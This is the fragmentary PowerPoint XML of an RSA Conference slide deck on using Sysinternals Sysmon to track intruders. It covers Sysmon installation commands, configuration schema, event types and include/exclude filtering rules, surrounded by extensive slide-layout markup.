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327" r:id="rId5"/>
    <p:sldId id="364" r:id="rId6"/>
    <p:sldId id="329" r:id="rId7"/>
    <p:sldId id="328" r:id="rId8"/>
    <p:sldId id="373" r:id="rId9"/>
    <p:sldId id="351" r:id="rId10"/>
    <p:sldId id="357" r:id="rId11"/>
    <p:sldId id="358" r:id="rId12"/>
    <p:sldId id="376" r:id="rId13"/>
    <p:sldId id="352" r:id="rId14"/>
    <p:sldId id="353" r:id="rId15"/>
    <p:sldId id="360" r:id="rId16"/>
    <p:sldId id="363" r:id="rId17"/>
    <p:sldId id="372" r:id="rId18"/>
    <p:sldId id="344" r:id="rId19"/>
    <p:sldId id="362" r:id="rId20"/>
    <p:sldId id="366" r:id="rId21"/>
    <p:sldId id="367" r:id="rId22"/>
    <p:sldId id="368" r:id="rId23"/>
    <p:sldId id="369" r:id="rId24"/>
    <p:sldId id="370" r:id="rId25"/>
    <p:sldId id="371" r:id="rId26"/>
    <p:sldId id="379" r:id="rId27"/>
    <p:sldId id="354" r:id="rId28"/>
    <p:sldId id="338" r:id="rId29"/>
    <p:sldId id="380" r:id="rId30"/>
    <p:sldId id="339" r:id="rId31"/>
    <p:sldId id="340" r:id="rId32"/>
    <p:sldId id="341" r:id="rId33"/>
    <p:sldId id="342" r:id="rId34"/>
    <p:sldId id="343" r:id="rId35"/>
    <p:sldId id="332" r:id="rId36"/>
    <p:sldId id="355" r:id="rId37"/>
    <p:sldId id="356" r:id="rId38"/>
    <p:sldId id="374" r:id="rId39"/>
    <p:sldId id="377" r:id="rId40"/>
    <p:sldId id="375" r:id="rId41"/>
    <p:sldId id="365" r:id="rId42"/>
    <p:sldId id="378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P-W04" id="{D58E937A-4AB8-481D-8F2C-C79E57A43384}">
          <p14:sldIdLst>
            <p14:sldId id="327"/>
            <p14:sldId id="364"/>
            <p14:sldId id="329"/>
            <p14:sldId id="328"/>
            <p14:sldId id="373"/>
            <p14:sldId id="351"/>
            <p14:sldId id="357"/>
            <p14:sldId id="358"/>
            <p14:sldId id="376"/>
            <p14:sldId id="352"/>
            <p14:sldId id="353"/>
            <p14:sldId id="360"/>
            <p14:sldId id="363"/>
            <p14:sldId id="372"/>
            <p14:sldId id="344"/>
            <p14:sldId id="362"/>
            <p14:sldId id="366"/>
            <p14:sldId id="367"/>
            <p14:sldId id="368"/>
            <p14:sldId id="369"/>
            <p14:sldId id="370"/>
            <p14:sldId id="371"/>
            <p14:sldId id="379"/>
            <p14:sldId id="354"/>
            <p14:sldId id="338"/>
            <p14:sldId id="380"/>
            <p14:sldId id="339"/>
            <p14:sldId id="340"/>
            <p14:sldId id="341"/>
            <p14:sldId id="342"/>
            <p14:sldId id="343"/>
            <p14:sldId id="332"/>
            <p14:sldId id="355"/>
            <p14:sldId id="356"/>
            <p14:sldId id="374"/>
            <p14:sldId id="377"/>
            <p14:sldId id="375"/>
            <p14:sldId id="365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Malcolm Davis" initials="MD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58B"/>
    <a:srgbClr val="8C2891"/>
    <a:srgbClr val="FCE8E8"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="8C2896"/>
    <a:srgbClr val="8C289B"/>
    <a:srgbClr val="91239B"/>
    <a:srgbClr val="8C3296"/>
    <a:srgbClr val="8D3197"/>
    <a:srgbClr val="970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8" autoAdjust="0"/>
    <p:restoredTop sz="87382" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="1110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 snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="99" d="100"/>
          <a:sy n="99" d="100"/>
        </p:scale>
        <p:origin x="357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D8A2D-4C11-AD4B-9C18-0D74CEDE754C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84DEB-6CE4-A345-9E53-5B46C6FEB1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188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CFA83-08B1-2F44-95C6-2CABC424890B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35D0F-15CB-5241-8DA7-9EC6F975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813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5D0F-15CB-5241-8DA7-9EC6F9751AD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4F9E6-938D-4629-83E7-354A05E299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7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4F9E6-938D-4629-83E7-354A05E299C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14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5D0F-15CB-5241-8DA7-9EC6F9751AD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1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1 speaker"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624595" y="3418704"/>
            <a:ext cx="2402702" cy="4774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700" b="1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4572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Speaker’s Name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102765" y="2274096"/>
            <a:ext cx="5089343" cy="1853404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2800" b="1" i="0" baseline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Session Title: Calibri Bold 28pt Initial Caps, Up to Four Lines in Length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002084" y="2089447"/>
            <a:ext cx="1020515" cy="1850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lang="en-US" sz="120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</a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XXXX-XXXX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="twitter bird.png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3" y="4648786"/>
            <a:ext cx="195273" cy="15717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624595" y="3947499"/>
            <a:ext cx="2402702" cy="975061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 b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3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0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4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0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5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0" i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Speaker’s Title</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Company/Organization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@Twitter handle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94325" y="4837092"/>
            <a:ext cx="537241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i="1" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>#RSAC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240578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21655" y="4826532"/>
            <a:ext cx="1051353" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666B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698501" y="1066259"/>
            <a:ext cx="8094623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7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21655" y="4826532"/>
            <a:ext cx="1051353" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666B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89493" y="1055225"/>
            <a:ext cx="4040188" cy="479822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789493" y="1607871"/>
            <a:ext cx="4040188" cy="2970993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-210312">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1900"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-201168">
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-192024">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1700"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1143000" indent="-18288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7319" y="1055225"/>
            <a:ext cx="4041775" cy="479822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977319" y="1607872"/>
            <a:ext cx="4041775" cy="2970992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1900"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="-210312">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="685800" indent="-201168">
              <a:defRPr sz="1700"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-192024">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1143000" indent="-18288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0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925" y="3734488"/>
            <a:ext cx="8077167" cy="35966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21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848" y="913026"/>
            <a:ext cx="5486400" cy="2821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198" y="4094153"/>
            <a:ext cx="7130624" cy="49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21655" y="4826532"/>
            <a:ext cx="1051353" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666B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98501" y="48454"/>
            <a:ext cx="7054850" cy="775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sz="2500" b="1" kern="1200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8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985" y="2844392"/>
            <a:ext cx="6327210" cy="129335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2700" b="1" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transition Slide / Sub-section Title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591749" y="62807"/>
            <a:ext cx="45749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spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#RSAC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="transition slide little piece on the right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73" y="0"/>
            <a:ext cx="1157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3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FFC2-849E-419F-9283-382438162BD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D93A-A5DC-4822-9920-E2002E0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6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40" y="1066260"/>
            <a:ext cx="8423385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21656" y="4826532"/>
            <a:ext cx="1051353" cy="273844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666B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4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1" y="10354"/>
            <a:ext cx="7054850" cy="775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484833" y="4826532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 b="1">
                <a:solidFill>
                  <a:srgbClr val="8D3197"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B8544877-F3A8-CE46-A6B4-1CFDD93369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591749" y="62807"/>
            <a:ext cx="45749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1" spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#RSAC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98501" y="1104361"/>
            <a:ext cx="8191499" cy="3527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Bullet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transition slide little piece on the right-01.png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t="-3" r="-3" b="83470"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9036473" y="0"/>
            <a:ext cx="115721" cy="8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3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0" r:id="rId2"/>
    <p:sldLayoutId id="2147483666" r:id="rId3"/>
    <p:sldLayoutId id="2147483657" r:id="rId4"/>
    <p:sldLayoutId id="2147483663" r:id="rId5"/>
    <p:sldLayoutId id="2147483672" r:id="rId6"/>
    <p:sldLayoutId id="2147483673" r:id="rId7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000" b="1" kern="1200" baseline="0">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Calibri"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="274320" indent="-274320" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1500"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:srgbClr val="1B7D7E"/>
        </a:buClr>
        <a:buSzPct val="85000"/>
        <a:buFontTx/>
        <a:buBlip>
          <a:blip r:embed="rId11"/>
        </a:buBlip>
        <a:defRPr sz="2300" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="576072" indent="-274320" algn="l" defTabSz="4572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rgbClr val="1B7D7E"/>
        </a:buClr>
        <a:buSzPct val="88000"/>
        <a:buFontTx/>
        <a:buBlip>
          <a:blip r:embed="rId11"/>
        </a:buBlip>
        <a:defRPr sz="2100" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Calibri"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="841248" indent="-265176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1B7D7E"/>
        </a:buClr>
        <a:buSzPct val="87000"/>
        <a:buFontTx/>
        <a:buBlip>
          <a:blip r:embed="rId11"/>
        </a:buBlip>
        <a:defRPr sz="2000" kern="1200" baseline="0">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Calibri"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1088136" indent="-237744" algn="l" defTabSz="4572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Pct val="86000"/>
        <a:buFontTx/>
        <a:buBlip>
          <a:blip r:embed="rId11"/>
        </a:buBlip>
        <a:defRPr sz="1800" kern="1200">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:latin typeface="Calibri"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1335024" indent="-246888" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="400"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:buClrTx/>
        <a:buSzPct val="85000"/>
        <a:buFontTx/>
        <a:buBlip>
          <a:blip r:embed="rId11"/>
        </a:buBlip>
        <a:defRPr sz="1700" kern="1200">
          <a:solidFill>
            <a:srgbClr val="000000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[redacted].com/Infected.sw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[redacted].com/Page.aspx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splunk.com/2014/11/24/monitoring-network-traffic-with-sysmon-and-splunk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mailto:mark.russinovich@microsoft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Mark Russinovich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dirty="0"/>
              <a:t>Tracking Hackers on Your Network with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysmon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HTA-W05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CTO, Microsoft Azure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Microsoft Corporation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>@markrussinovich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options are limited:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cannot disable events via basic options (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RawAccessRead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Advanced filtering not possible (e.g. process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>name filters)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sysmon configuration file supports all configuration options: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install: 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accepteula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t> c:\SysmonConfig.xml </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>update: 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="8C2891"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -c c:\SysmonConfig.xml </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8C289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 Schema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40" y="1066260"/>
            <a:ext cx="8423385" cy="3760272"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Schema version: current is 2.01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RawReadAccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> added)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HashAlgorithms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: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pplies to all events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘*’ for all hash types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>EventFiltering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Flexible filtering rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If event type not specified, default capture rule applies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988" y="1268998"/>
            <a:ext cx="3826404" cy="26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5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40" y="1066259"/>
            <a:ext cx="8423385" cy="4000647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each event is specified using its tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Onmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can be “include” or “exclude”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include and exclude refer to filter effect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filters described later…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301752" lvl="1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	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="301752" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="8C2891"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="301752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491970"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444609" y="1046929"/>
          <a:ext cx="1653016" cy="25363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3016">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1129304438"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3417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Tags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3649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ProcessCreate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2332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ProcessTerminate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93928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FileCreateTime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924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NetworkConnect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5738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DriverLoad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22207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ImageLoad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778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CreateRemoteThread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537851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RawAccessRead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0187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8476" y="3316487"/>
            <a:ext cx="2643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55448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tag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onmatch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=“include”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-155448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	&lt;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include filter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/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-155448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	…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-155448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&lt;/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tag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9680" y="3316487"/>
            <a:ext cx="2667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55448"/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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tag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onmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“exclude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-155448"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a: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i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exclude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-155448"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-155448"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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932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Tags With No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40" y="1066260"/>
            <a:ext cx="4166401" cy="37602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Useful for enabling specific event types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If no filter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has opposite effect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Include: don’t log any events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exclude: log all events of the tag type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This configuration enables the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ProcessCreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: because of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onmatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> exclude</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ProcessTerminate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: because it is omitted and by default enabled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09" y="1913688"/>
            <a:ext cx="4432473" cy="252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31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Architecture and Advanced Filtering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826000"/>
            <a:ext cx="1052513" cy="274638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F56C8676-1494-424A-9EE1-69F4EB666BA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7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Sysmon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39" y="1066260"/>
            <a:ext cx="7183585" cy="181029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Windows service and device driver (~1.5 MB total)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Single binary includes 32-bit and 64-bit versions of both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
